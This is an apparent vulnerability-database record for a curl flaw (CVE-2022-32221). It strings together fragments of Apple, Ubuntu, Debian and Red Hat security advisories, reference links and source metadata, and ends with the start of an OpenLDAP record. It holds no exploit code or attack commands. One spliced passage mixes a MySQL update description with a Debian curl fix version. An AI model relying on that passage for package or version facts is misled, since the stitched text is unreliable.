YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\nWebKit Bugzilla: 248268\nCVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\n\nWi-Fi\nAvailable for: macOS Ventura\nImpact: An app may be able to disclose kernel memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nWindows Installer\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23508: Mickey Jin (@patch1t)\n\nAdditional recognition\n\nBluetooth\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nKernel\nWe would like to acknowledge Nick Stenning of Replicate for their\nassistance. \n\nShortcuts\nWe would like to acknowledge Baibhav Anand Jha from ReconWithMe and\nCristian Dinca of Tudor Vianu National High School of Computer\nScience, Romania for their assistance. \n\nWebKit\nWe would like to acknowledge Eliya Stein of Confiant for their\nassistance. \n\nmacOS Ventura 13.2 may be obtained from the Mac App Store or Apple\u0027s\nSoftware Downloads web site: https://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke\nNxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk\n7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb\nm9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U\nVsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd\nCx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp\nTCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK\nrrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg\njoKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9\n3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq\nQR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU\n/Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w=\n=pcJ4\n-----END PGP SIGNATURE-----\n\n\n. \n\nSoftware Description:\n- mysql-8.0: MySQL database\n- mysql-5.7: MySQL database\n\nDetails:\n\nMultiple security issues were discovered in MySQL and this update includes\nnew upstream MySQL versions to fix these issues. \n\nIn addition to security fixes, the updated packages contain bug fixes, new\nfeatures, and possibly incompatible changes. In general, a standard system update will make all the necessary\nchanges. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 7.74.0-1.3+deb11u5. This update also revises the fix for\nCVE-2022-27774 released in DSA-5197-1. \n\nWe recommend that you upgrade your curl packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2023:4139-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:4139\nIssue date: 2023-07-18\nCVE Names: CVE-2022-32221 CVE-2023-23916 \n=====================================================================\n\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9.0\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: POST following PUT confusion (CVE-2022-32221)\n\n* curl: HTTP multi-header compression denial of service (CVE-2023-23916)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream EUS (v.9.0):\n\naarch64:\ncurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS EUS (v.9.0):\n\nSource:\ncurl-7.76.1-14.el9_0.6.src.rpm\n\naarch64:\ncurl-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\n\nx86_64:\ncurl-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32221\nhttps://access.redhat.com/security/cve/CVE-2023-23916\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32221"
},
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32221",
"trust": 2.6
},
{
"db": "HACKERONE",
"id": "1704017",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/05/17/4",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "170777",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169535",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169538",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170166",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.4030",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5421",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "170729",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170648",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-424148",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-32221",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170696",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "173569",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"id": "VAR-202210-1888",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:55:07.161000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=216855"
},
{
"title": "Ubuntu Security Notice: USN-5702-2: curl vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5702-2"
},
{
"title": "Ubuntu Security Notice: USN-5702-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5702-1"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32221"
},
{
"title": "IBM: Security Bulletin: The Community Edition of IBM ILOG CPLEX Optimization Studio is affected by multiple vulnerabilities in libcurl (CVE-2022-42915, CVE-2022-42916, CVE-2022-32221)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=93e8baf3e9bfd9ab92a05b44368ef244"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-668",
"trust": 1.1
},
{
"problemtype": "CWE-200",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20230110-0006/"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20230208-0002/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213604"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213605"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2023/dsa-5330"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/19"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/20"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1704017"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2023/05/17/4"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-32221/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.4030"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-reuse-after-free-39731"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213604"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169538/ubuntu-security-notice-usn-5702-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169535/ubuntu-security-notice-usn-5702-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5421"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170777/debian-security-advisory-5330-1.html"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.3,
"url": "https://ubuntu.com/security/notices/usn-5702-1"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5702-2"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23493"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23497"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23499"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23502"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.6"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.14"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.85.0-1ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23508"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213604."
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213605."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23501"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23496"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23498"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23500"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://www.oracle.com/security-alerts/cpujan2023.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.10.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21881"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.04.1"
},
{
"trust": 0.1,
"url": "https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.41-0ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21871"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21867"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5823-1"
},
{
"trust": 0.1,
"url": "https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43552"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/curl"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4139"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23916"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-32221",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169535",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170696",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170729",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170777",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "173569",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-12-05T00:00:00",
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"date": "2022-10-27T13:04:37",
"db": "PACKETSTORM",
"id": "169538",
"ident": null
},
{
"date": "2022-10-27T13:03:39",
"db": "PACKETSTORM",
"id": "169535",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2023-01-24T16:41:07",
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"date": "2023-01-24T16:40:49",
"db": "PACKETSTORM",
"id": "170696",
"ident": null
},
{
"date": "2023-01-25T16:09:53",
"db": "PACKETSTORM",
"id": "170729",
"ident": null
},
{
"date": "2023-01-30T16:25:15",
"db": "PACKETSTORM",
"id": "170777",
"ident": null
},
{
"date": "2023-07-18T13:47:37",
"db": "PACKETSTORM",
"id": "173569",
"ident": null
},
{
"date": "2022-10-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"date": "2022-12-05T22:15:10.343000",
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-01T00:00:00",
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"date": "2023-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"date": "2026-02-13T20:16:13.200000",
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
}
}
VAR-202004-0530
Vulnerability from variot - Updated: 2026-04-10 22:49In filter.c in slapd in OpenLDAP before 2.4.50, LDAP search filters with nested boolean expressions can result in denial of service (daemon crash). OpenLDAP Exists in a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. The filter.c file of slapd in versions earlier than OpenLDAP 2.4.50 has a security vulnerability.
For the oldstable distribution (stretch), this problem has been fixed in version 2.4.44+dfsg-5+deb9u4.
For the stable distribution (buster), this problem has been fixed in version 2.4.47+dfsg-3+deb10u2.
We recommend that you upgrade your openldap packages.
For the detailed security status of openldap please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openldap
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
